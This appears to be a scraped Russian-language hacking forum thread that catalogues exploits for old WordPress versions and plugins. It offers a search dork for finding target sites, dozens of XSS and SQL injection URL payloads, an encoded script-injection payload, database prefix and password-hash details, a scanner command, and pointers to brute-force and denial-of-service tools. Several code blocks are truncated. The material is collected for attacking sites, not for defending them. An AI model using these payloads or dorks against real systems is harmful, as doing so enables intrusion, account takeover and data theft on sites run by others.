![]() |
[ Обзор уязвимостей WordPress ]
Vulnerabilities:
Wordpress Multiple Versions Pwnpress Exploitation Tookit (0.2pub) Wordpress plugin myflash <= 1.00 (wppath) RFI Vulnerability Enigma 2 WordPress Bridge (boarddir) Remote File Include Vulnerability 1.4* Wordpress plugin wordTube <= 1.43 (wpPATH) RFI Vulnerability Wordpress plugin wp-Table <= 1.43 (inc_dir) RFI Vulnerability Wordpress Plugin myGallery <= 1.4b4 Remote File Inclusion Vulnerability 1.5.1.* Wordpress <= 1.5.1.3 Remote Code Execution eXploit (metasploit) Wordpress <= 1.5.1.3 Remote Code Execution 0-Day Exploit Wordpress <= 1.5.1.2 xmlrpc Interface SQL Injection Exploit WordPress <= 1.5.1.1 SQL Injection Exploit WordPress <= 1.5.1.1 "add new admin" SQL Injection Exploit 2.0.* WordPress <= 2.0.2 (cache) Remote Shell Injection Exploit Wordpress <= 2.0.6 wp-trackback.php Remote SQL Injection Exploit Wordpress 2.0.5 Trackback UTF-7 Remote SQL Injection Exploit 2.1.* Wordpress 2.1.2 (xmlrpc) Remote SQL Injection Exploit Wordpress 2.1.3 admin-ajax.php SQL Injection Blind Fishing Exploit 2.* Wordpress <= 2.x dictionnary & Bruteforce attack WordPress 2.2 (wp-app.php) Arbitrary File Upload Exploit Wordpress 2.2 (xmlrpc.php) Remote SQL Injection Exploit dork: Код:
"is proudly powered by WordPress"Full path disclosure: WordPress < 1.5.2 Cross-site Scripting: /wp-login.php?action=login&redirect_to=[XSS] /wp-admin/templates.php?file=[XSS] /wp-admin/post.php?content=[XSS] http://www.example.com/wp-admin/edit-comments.php?s=[XSS] http://www.example.com/wp-admin/edit-comments.php?s=bla&submit=Search&mode=[XSS] http://www.example.com/wp-admin/templates.php?file=[XSS] http://www.example.com/wp-admin/link-add.php?linkurl=[XSS] http://www.example.com/wp-admin/link-add.php?name=[XSS] http://www.example.com/wp-admin/link-categories.php?cat_id=[XSS]&action=Edit http://www.example.com/wp-admin/link-manager.php?order_by=[XSS] http://www.example.com/wp-admin/link-manager.php?cat_id=[XSS] http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_url=[XSS] http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_name=[XSS] http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_description=[XSS] http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_rel=[XSS] http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_image=[XSS] http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_rss_uri=[XSS] http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_notes=[XSS] http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_id=[XSS] http://www.example.com/wp-admin/link-manager.php?action=linkedit&order_by=[XSS] http://www.example.com/wp-admin/link-manager.php?action=linkedit&cat_id=[XSS] http://www.example.com/wp-admin/post.php?content=[XSS] http://www.example.com/wp-admin/moderation.php?action=update&item_approved=[XSS] SQL injection examples: http://www.example.com/index.php?m=[SQL] http://www.example.com/wp-admin/edit.php?m=[SQL] http://www.example.com/wp-admin/link-categories.php?cat_id=[SQL]&action=Edit http://www.example.com/index.php?cat=100)%09or%090=0%09or%09(0=1 Tables/Prefix_/Columns: wp_ Hash algorithms: md5(password) WordPress Vulnerability Scanner Код:
$ perl -x wp-scanner.pl http://testblog/wordpress/ |
WordPress Scanner v1.3b BETA
http://blogsecurity.net/cgi-bin/wp-scanner.cgi
http://blogsecurity.net/projects/wp-scanner.zip |
WordPress <=2.0.4 XSS
simple PoC:
Код HTML:
<html>Код HTML:
<html>(we prove we can inject ANY JS): Код HTML:
<html> |
07 июня, 2007
Программа: WordPress 2.2, возможно более ранние версии Опасность: Средняя Наличие эксплоита: Да Описание: Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в методе "wp.suggestCategories" в сценарии xmlrpc.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Для выполнения этого нужно что была разрешена регистрация на сайте, отправляется запрос только POST Вот пример запроса Код HTML:
<methodCall> |
Wordpress 2.2 Username Enumeration
PHP код:
|
WordPress Security Whitepaper
Цитата:
&& Writing Secure WordPress Plugins http://michaeldaw.org/papers/securing_wp_plugins/ |
WordPress PHP_Self Cross-Site Scripting Vulnerability
Код:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"Код:
/wp-admin/plugins.php?page=akismet-key-configКод:
_wp_http_referer="'%2522><script>eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41))</script>" |
Wordpress Plugin Scanner
|
Перебор паролей для версии Wordpress 2.x на Python тут.
|
runPHP Plugin
/wp-admin/post.php?action=edit&post=1/*SQLINJECTION*/%20AND%201′=0 WP <2.3 http://target/wp-admin/edit-post-rows.php?posts_columns[]=<script>alert(1)</script> WordPress 2.0.1 Remote DoS Exploit Код:
#!perl |
| Время: 23:23 |